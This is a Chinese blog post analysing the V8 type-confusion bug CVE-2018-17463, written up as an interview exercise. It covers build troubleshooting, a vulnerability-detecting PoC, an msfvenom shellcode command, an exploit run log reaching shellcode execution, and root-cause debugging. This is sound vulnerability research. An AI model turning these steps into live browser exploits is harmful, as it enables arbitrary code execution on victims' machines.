<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"guiu.xyz","root":"/","scheme":"Pisces","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="拿到这个题目我是一脸懵逼…… 完全没接触过的新领域，但是对这种简单粗暴的面试形式非常感兴趣，这就是以后的工作内容和工作方式吗，i了i了。">
<meta property="og:type" content="article">
<meta property="og:title" content="V8引擎CVE-2018-17463漏洞分析记录--记一道新奇的面试题">
<meta property="og:url" content="http://guiu.xyz/p/9e20141d.html">
<meta property="og:site_name" content="Hcl的个人小站">
<meta property="og:description" content="拿到这个题目我是一脸懵逼…… 完全没接触过的新领域，但是对这种简单粗暴的面试形式非常感兴趣，这就是以后的工作内容和工作方式吗，i了i了。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414004028256474580d7b43b4cd6.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-202004140042141908b3b71d757d4ce74.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200413195126439236f779dc40d4d2d.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200413195149228b3d93a35f4960abd.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-202004140030582015ce146584a2752c1.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414003311934f4a17ceb4502a82b.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414132308805541e4bdd7608cb10.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414150541447399b26eba261e723.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-202004141537416604c0d9674bd26c5ce.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414153812356368ec5a4fdfa4b91.png">
<meta property="og:image" content="http://sz.guiu.xyz/images/image-20200414154238022cfa426a0c693c0de.png">
<meta property="article:published_time" content="2020-04-14T15:02:43.000Z">
<meta property="article:modified_time" content="2020-04-14T15:02:43.000Z">
<meta property="article:author" content="guiu">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://sz.guiu.xyz/images/image-20200414004028256474580d7b43b4cd6.png">

<link rel="canonical" href="http://guiu.xyz/p/9e20141d.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>V8引擎CVE-2018-17463漏洞分析记录--记一道新奇的面试题 | Hcl的个人小站</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hcl的个人小站</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://guiu.xyz/p/9e20141d.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="guiu">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hcl的个人小站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          V8引擎CVE-2018-17463漏洞分析记录--记一道新奇的面试题
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-14 23:02:43" itemprop="dateCreated datePublished" datetime="2020-04-14T23:02:43+08:00">2020-04-14</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>拿到这个题目我是一脸懵逼……</p>
<p>完全没接触过的新领域，但是对这种简单粗暴的面试形式非常感兴趣，这就是以后的工作内容和工作方式吗，i了i了。</p>
<a id="more"></a>
<h1>搜集资料</h1>
<p><img src="http://sz.guiu.xyz/images/image-20200414004028256474580d7b43b4cd6.png" alt="image-20200414004028256"></p>
<blockquote>
<p>漏洞存在于<code>src/compiler/js-operator.cc:625</code>。在此处，代码定义了许多常见<code>IR</code>操作的标识，存在问题的是对<code>JSCreateObject</code>操作的判断。</p>
</blockquote>
<p><img src="http://sz.guiu.xyz/images/image-202004140042141908b3b71d757d4ce74.png" alt="image-20200414004214190"></p>
<h1>准备环境</h1>
<p><strong>实验环境：kali linux</strong></p>
<h2 id="安装depot-tools"><a class="header-anchor" href="#安装depot-tools"></a>安装depot_tools</h2>
<blockquote>
<p>depot_tools是个工具包，里面包含gclient、gcl、gn和ninja等工具。其中gclient是代码获取工具，它其实是利用了svn和git。主要涉及的depot_tools文件夹下的文件有：gclient、<a href="http://gclient.py" target="_blank" rel="noopener">gclient.py</a>、<a href="http://subcommand.py" target="_blank" rel="noopener">subcommand.py</a>、gclient_utils.py。</p>
</blockquote>
<p>克隆depot_tools仓库源代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git clone https:&#x2F;&#x2F;chromium.googlesource.com&#x2F;chromium&#x2F;tools&#x2F;depot_tools.git</span><br></pre></td></tr></table></figure>
<p>将 <code>depot_tools</code>的路径添加到环境变量:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ export PATH&#x3D;&#x2F;path&#x2F;to&#x2F;depot_tools:$PATH</span><br></pre></td></tr></table></figure>
<h2 id="构建v8引擎"><a class="header-anchor" href="#构建v8引擎"></a>构建<code>v8</code>引擎</h2>
<p>切换代码至漏洞修复前的版本：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git checkout 568979f4d891bafec875fab20f608ff9392f4f29</span><br><span class="line">gclient sync</span><br></pre></td></tr></table></figure>
<blockquote>
<p><a href="https://v8.dev/docs/build" target="_blank" rel="noopener">https://v8.dev/docs/build</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/25120909" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/25120909</a></p>
</blockquote>
<h3 id="踩坑记录"><a class="header-anchor" href="#踩坑记录"></a>踩坑记录</h3>
<p><code>gclient sync</code> 失败：</p>
<p>解决办法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gclient config https:&#x2F;&#x2F;github.com&#x2F;v8&#x2F;v8.git</span><br></pre></td></tr></table></figure>
<p>对源码进行编译：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tools/dev/v8gen.py x64.debug 		//生成ninja构建文件</span><br><span class="line">ninja -C out.gn/x64.debug d8		//编译v8源代码</span><br></pre></td></tr></table></figure>
<p><code>v8gen.py</code>生成<code>ninja</code>构建文件失败：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> ⚡ root@kali-guiu ~/CVE-2018-17463/v8 ➦ 568979f4d8 tools/dev/v8gen.py x64.debug -vv</span><br><span class="line"><span class="comment">################################################################################</span></span><br><span class="line">/usr/bin/python -u tools/mb/mb.py gen -f infra/mb/mb_config.pyl -m developer_default -b x64.debug out.gn/x64.debug</span><br><span class="line">  </span><br><span class="line">  Writing <span class="string">""</span><span class="string">"\</span></span><br><span class="line"><span class="string">  is_debug = true</span></span><br><span class="line"><span class="string">  target_cpu = "</span>x64<span class="string">"</span></span><br><span class="line"><span class="string">  v8_enable_backtrace = true</span></span><br><span class="line"><span class="string">  v8_enable_slow_dchecks = true</span></span><br><span class="line"><span class="string">  v8_optimized_debug = false</span></span><br><span class="line"><span class="string">  "</span><span class="string">""</span> to /root/CVE-2018-17463/v8/out.gn/x64.debug/args.gn.</span><br><span class="line">  </span><br><span class="line">  /root/CVE-2018-17463/v8/buildtools/linux64/gn gen out.gn/x64.debug --check</span><br><span class="line">    -&gt; returned 1</span><br><span class="line">  ERROR at //gni/v8.gni:8:1: Can<span class="string">'t load input file.</span></span><br><span class="line"><span class="string">  import("//build/split_static_library.gni")</span></span><br><span class="line"><span class="string">  ^----------------------------------------</span></span><br><span class="line"><span class="string">  Unable to load:</span></span><br><span class="line"><span class="string">    /root/CVE-2018-17463/v8/build/split_static_library.gni</span></span><br><span class="line"><span class="string">  I also checked in the secondary tree for:</span></span><br><span class="line"><span class="string">    /root/CVE-2018-17463/v8/build/secondary/build/split_static_library.gni</span></span><br><span class="line"><span class="string">  See //BUILD.gn:18:1: whence it was imported.</span></span><br><span class="line"><span class="string">  import("gni/v8.gni")</span></span><br><span class="line"><span class="string">  ^------------------</span></span><br><span class="line"><span class="string">  GN gen failed: 1</span></span><br></pre></td></tr></table></figure>
<p>注意到是<code>build/split_static_library.gni</code>文件导入错误，去源码中定位到错误代码处，发现并没有这个文件。</p>
<p>切回最新版本，编译，仍然失败。</p>
<p>考虑是因为拉取代码的问题（毕竟404），重来，<code>fetch v8</code> 重新拉取代码。</p>
<p><strong>发现回退版本编译还是失败，使用最新版本编译成功。</strong></p>
<p>切回master分支，对比该文件，发现<code>split_static_library.gni</code>已经在后面的更新中被移除了，查看发现build文件夹为另一个git子模块，且已经更新到最新（2020.3.1）。</p>
<p><img src="http://sz.guiu.xyz/images/image-20200413195126439236f779dc40d4d2d.png" alt="image-20200413195126439"></p>
<p><img src="http://sz.guiu.xyz/images/image-20200413195149228b3d93a35f4960abd.png" alt="image-20200413195149228"></p>
<p>那么把报错这行改掉？</p>
<p>失败。</p>
<p>那将需要的这个文件加回去？（谷歌快照找到了这个文件的内容），加回去仍然失败。</p>
<p>最后我用<code>git revert</code>撤销了修复漏洞那一次的修改，编译仍然失败，查看发现<code>build</code>子模块仍然是最新版本（2020.3.1），于是想到可能是编译工具太新了，就手动回退<code>build</code>子模块到2018.9.26之前(该漏洞修复时的commit时间)的某次提交（时间相近的<code>build</code>包肯定就匹配这个版本了吧）。</p>
<p>发现还是不通过，更换多个版本发现仍然会出现新问题。总之就是不匹配。</p>
<p>然后回到最新版本，手动将关于漏洞的改动撤销，编译通过。</p>
<p>使用<a href="https://xz.aliyun.com/t/5413" target="_blank" rel="noopener">Google V8引擎的CVE-2018-17463漏洞分析</a> 文中的<code>poc</code>和<code>exp</code>脚本测试：</p>
<p>结果：<code>poc</code>能探测到漏洞但是<code>exp</code>拿不到<code>shell</code>，应该是后续的利用链出了问题。</p>
<p>无奈重新编译，仔细查看官方文档，发现官方仓库中没有<code>build</code>文件夹（这里才反应过来，<code>build</code>是git子模块啊怎么可能在一个仓库里被同步，也不方便管理啊），猜想<code>build</code>文件夹是<code>gclient sync</code>同步的时候自动下载的。于是去翻官方文档，发现确实是需要每次回退版本之后都要<code>gclient sync</code>一下（不断迭代过程中构建方式发生了变化）。而我的同步操作是在版本回退之前做的，难怪最新版本能够编译通过。</p>
<p>解决：</p>
<p>回退到修复前的版本，再次使用<code>gclient sync</code>命令，同步当前适合的编译脚本？？？（查这个命令之后再写），漫长的等待之后，再编译，成功了。</p>
<p>执行<code>exp</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">⚡ root@kali-guiu  ~&#x2F;CVE-2018-17463&#x2F;v8&#x2F;out.gn&#x2F;x64.debug  ➦ 568979f4d8  .&#x2F;d8 ..&#x2F;exp.js     </span><br><span class="line">step 0: Game start</span><br><span class="line">Hacked by P4nda</span><br><span class="line">step 1: check whether vulnerability exists</span><br><span class="line">[+] log: CVE-2018-17463 exists in the d8  </span><br><span class="line">step 2: find collision</span><br><span class="line">[+] log: b6 &amp; b31 are collision in directory  </span><br><span class="line">step 3: get address of JSFunciton</span><br><span class="line">[+] log: 0x00001dfb486a8d81  </span><br><span class="line">step 4: make ArrayBuffer&#39;s backing_store -&gt; JSFunciton</span><br><span class="line">[+] SharedFunctionInfo addr :0x00001dfb486a8d49</span><br><span class="line">step 5: make ArrayBuffer&#39;s backing_store -&gt;  SharedFunctionInfo</span><br><span class="line">[+] WasmExportedFunctionData addr :0x00001dfb486a8d21</span><br><span class="line">step 6: make ArrayBuffer&#39;s backing_store -&gt;  WasmExportedFunctionData</span><br><span class="line">[+] WasmInstanceObject addr :0x00001dfb486a8b91</span><br><span class="line">step 7: make ArrayBuffer&#39;s backing_store -&gt;  WasmInstanceObject</span><br><span class="line">[+] imported_function_targets addr :0x00005557617de560</span><br><span class="line">step 8: make ArrayBuffer&#39;s backing_store -&gt;  imported_function_targets</span><br><span class="line">[+] code addr :0x00003424ae2d7560</span><br><span class="line">[+] log: step 9: make ArrayBuffer&#39;s backing_store -&gt;  rwx_area  </span><br><span class="line">step 10: write shellcode for poping up a calculator</span><br><span class="line">[+] Press Any key to execute Shellcode</span><br><span class="line"></span><br><span class="line">No protocol specified</span><br><span class="line">Error: Can&#39;t open display: :0.0</span><br></pre></td></tr></table></figure>
<p>可见成功，但是没有跳出<code>calculater</code>，可能<code>ubuntu</code>和<code>kali</code>开启计算器的命令不一样，那换个<code>shellcode</code>：</p>
<p><code>msf</code>生成<code>shellcode</code>：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/exec CMD=screenfetch -f num</span><br></pre></td></tr></table></figure>
<p><img src="http://sz.guiu.xyz/images/image-202004140030582015ce146584a2752c1.png" alt="image-20200414003058201"></p>
<p>计算器始终打不开（<code>GTK</code>的问题），<code>shellcode</code>就用了<code>screenfetch</code>代替</p>
<p>exp：</p>
<p><img src="http://sz.guiu.xyz/images/image-20200414003311934f4a17ceb4502a82b.png" alt="image-20200414003311934"></p>
<p>成功，换<code>bash</code>也成功了。</p>
<p>问题：</p>
<p>切换到指定分支之后无法编译。</p>
<p>（原因：第一次接触到<code>gclient</code>不会用，轻信了谷歌搜到的教程，还是要看官方文档）</p>
<h1>开始分析</h1>
<h2 id="调试v8引擎"><a class="header-anchor" href="#调试v8引擎"></a>调试v8引擎</h2>
<p>仅仅复现利用还是不够的，起码要亲自将漏洞跟一遍。</p>
<h3 id="v8引擎调试环境："><a class="header-anchor" href="#v8引擎调试环境："></a>v8引擎调试环境：</h3>
<p>参考教程：</p>
<ul>
<li><a href="https://gtoad.github.io/2019/07/25/V8-Debug/" target="_blank" rel="noopener">https://gtoad.github.io/2019/07/25/V8-Debug/</a></li>
<li><a href="https://www.freebuf.com/vuls/203721.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/203721.html</a></li>
</ul>
<h2 id="漏洞原因分析："><a class="header-anchor" href="#漏洞原因分析："></a>漏洞原因分析：</h2>
<p>问题在于<code>src/compiler/js-operator.cc:625</code>处对<code>JSCreateObject</code>操作的表示存在判断错误，代码如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">V(CreateObject, <span class="attr">Operator</span>::kNoWrite, <span class="number">1</span>, <span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>而<code>kNoWrite</code>操作标识的定义如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">// transformations for nodes that have this operator.</span></span><br><span class="line">  enum Property &#123;</span><br><span class="line">    kNoProperties = <span class="number">0</span>,</span><br><span class="line">    kCommutative = <span class="number">1</span> &lt;&lt; <span class="number">0</span>,  <span class="comment">// OP(a, b) == OP(b, a) for all inputs.</span></span><br><span class="line">    kAssociative = <span class="number">1</span> &lt;&lt; <span class="number">1</span>,  <span class="comment">// OP(a, OP(b,c)) == OP(OP(a,b), c) for all inputs.</span></span><br><span class="line">    kIdempotent = <span class="number">1</span> &lt;&lt; <span class="number">2</span>,   <span class="comment">// OP(a); OP(a) == OP(a).</span></span><br><span class="line">    kNoRead = <span class="number">1</span> &lt;&lt; <span class="number">3</span>,       <span class="comment">// Has no scheduling dependency on Effects</span></span><br><span class="line">    kNoWrite = <span class="number">1</span> &lt;&lt; <span class="number">4</span>,      <span class="comment">// Does not modify any Effects and thereby</span></span><br><span class="line">                            <span class="comment">// create new scheduling dependencies.</span></span><br><span class="line">... ...</span><br><span class="line">  &#125;;</span><br></pre></td></tr></table></figure>
<p>而<code>ObjectCreate()</code>会利用原有<code>Object</code>中的<code>Map</code>生成新的<code>Map</code>，再根据<code>Map</code>的类型，去生成新的<code>Object</code>。</p>
<p>调试中的具体表现是<code>fast mode</code>的map会变成<code>dictionary mode</code>。而这明显是一个<code>side-effect</code>的操作，从而形成了漏洞。</p>
<blockquote>
<p><code>V8</code> 对于 <code>JavaScript</code> 对象的两种访问模式：</p>
<ul>
<li><strong>Dictionary(Slow) Mode</strong>：字典模式也称为哈希表模式，<code>V8</code> 使用哈希表来存储对象的属性。</li>
<li><strong>Stable(Fast) Mode</strong>：使用类似数组（<code>C Struct</code>）结构来存储对象的属性并使用 <code>Offset</code> 进行访问。</li>
</ul>
</blockquote>
<figure class="highlight js"><figcaption><span>poc2.js</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> a = &#123;<span class="attr">x</span> : <span class="number">1</span>&#125;;</span><br><span class="line">%DebugPrint(a);</span><br><span class="line"><span class="built_in">Object</span>.create(a);</span><br><span class="line">%DebugPrint(a);</span><br></pre></td></tr></table></figure>
<p><img src="http://sz.guiu.xyz/images/image-20200414132308805541e4bdd7608cb10.png" alt="image-20200414132308805"></p>
<p><code>ObjectCreate()</code>会把一个<code>Object</code>全部的属性值都放到<code>properties</code>中存储，并将原先的线性结构改成<code>hash</code>表的字典结构。</p>
<h2 id="利用"><a class="header-anchor" href="#利用"></a>利用</h2>
<p><strong>真正的漏洞在于：</strong></p>
<p>当执行了<code>ObjectCreate()</code>之后，原本<code>Stable(Fast) Mode</code>的属性会被转化为<code>Dictionary Mode</code>，正常情况下，<code>JIT</code>生成的<code>IR-Code</code>在每次访问属性之前都会做类型检查，然而操作标识被设置为<code>kNoWrite</code>之后，会跳过之后的类型检查，<code>JIT</code>优化后的代码依旧按照<code>Stable(Fast) Mode</code>使用<code>offset</code>访问属性，造成了内存泄露。</p>
<h3 id="利用步骤"><a class="header-anchor" href="#利用步骤"></a>利用步骤</h3>
<p>可以构造一个函数，首先访问一次其内部变量，然后调用<code>ObjectCreate</code>操作，再次访问另一个变量，那么可能造成第二个变量的类型检查消失，然后利用<code>DictionaryProperties</code>和<code>FastProperties</code>对属性的访问方式区别来执行任意代码。</p>
<p>首先构造一个数组<code>x</code>，初始化时赋予属性<code>a=0x1234</code>，增加属性<code>b=0x5678</code></p>
<p>构造函数<code>bad_create</code>：首先访问<code>x.a</code>，这里可以通过类型检查，而在后续返回<code>x.b</code>，由于<code>JSCreate</code>的属性是<code>kNoWrite</code>的，则返回之前的<code>x.b</code>二次检查消失，造成仍然返回一个与<code>x.b</code>偏移相同的数据</p>
<p>由于<code>Properties</code>的内存分布发生变化，所以返回值一定不会是<code>0x5678</code>。</p>
<h3 id="验证poc"><a class="header-anchor" href="#验证poc"></a>验证poc</h3>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_vul</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">bad_create</span>(<span class="params">x</span>)</span>&#123;</span><br><span class="line">        x.a;</span><br><span class="line">        <span class="built_in">Object</span>.create(x);</span><br><span class="line">        <span class="keyword">return</span> x.b;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>;i &lt; <span class="number">10000</span>; i++)&#123;</span><br><span class="line">        <span class="keyword">let</span> x = &#123;<span class="attr">a</span> : <span class="number">0x1234</span>&#125;;</span><br><span class="line">        x.b = <span class="number">0x5678</span>; </span><br><span class="line">        <span class="keyword">let</span> res = bad_create(x);</span><br><span class="line">        <span class="comment">//log(res);</span></span><br><span class="line">        <span class="keyword">if</span>( res != <span class="number">0x5678</span>)&#123;</span><br><span class="line">            <span class="built_in">console</span>.log(i);</span><br><span class="line">            <span class="built_in">console</span>.log(<span class="string">"CVE-2018-17463 exists in the d8"</span>);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">"bad d8 version"</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">check_vul();</span><br></pre></td></tr></table></figure>
<p>执行结果：</p>
<p><img src="http://sz.guiu.xyz/images/image-20200414150541447399b26eba261e723.png" alt="image-20200414150541447"></p>
<p>即会在5000多次调用之后执行<code>JIT</code>优化，触发漏洞。</p>
<p>此时虽然可以触发漏洞，但是**想要利用漏洞执行任意代码，还需要让其找到对应属性的偏移地址，才能进行后续的利用。**而且由于<code>DictionaryProperties</code>是一个哈希表，每次执行时对应属性的偏移地址在不断变化。</p>
<p>验证：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> a1 = &#123;<span class="attr">x</span> : <span class="number">1</span>,<span class="attr">y</span>:<span class="number">2</span>,<span class="attr">z</span>:<span class="number">3</span>&#125;;</span><br><span class="line">a1.b = <span class="number">4</span>;</span><br><span class="line">a1.c = <span class="number">5</span>;</span><br><span class="line">a1.d = <span class="number">6</span>;</span><br><span class="line"><span class="keyword">let</span> a2 = &#123;<span class="attr">u</span> : <span class="number">2</span>,<span class="attr">v</span>:<span class="number">3</span>,<span class="attr">w</span>:<span class="number">4</span>&#125;;</span><br><span class="line">a2.e = <span class="number">7</span>;</span><br><span class="line">a2.f = <span class="number">8</span>;</span><br><span class="line">a2.g = <span class="number">9</span>;</span><br><span class="line"><span class="built_in">Object</span>.create(a1);</span><br><span class="line">%DebugPrint(a1);</span><br><span class="line"><span class="built_in">Object</span>.create(a2);</span><br><span class="line">%DebugPrint(a2);</span><br><span class="line">readline();</span><br></pre></td></tr></table></figure>
<p>第一次（以<code>a2</code>为例）：</p>
<p><img src="http://sz.guiu.xyz/images/image-202004141537416604c0d9674bd26c5ce.png" alt="image-20200414153741660"></p>
<p>第二次：</p>
<p><img src="http://sz.guiu.xyz/images/image-20200414153812356368ec5a4fdfa4b91.png" alt="image-20200414153812356"></p>
<p>找到另一个规律：</p>
<p>在同一次执行过程中，相同属性构造的<code>Object</code>，在<code>DictionaryProperties</code>中的偏移是相同的，验证：</p>
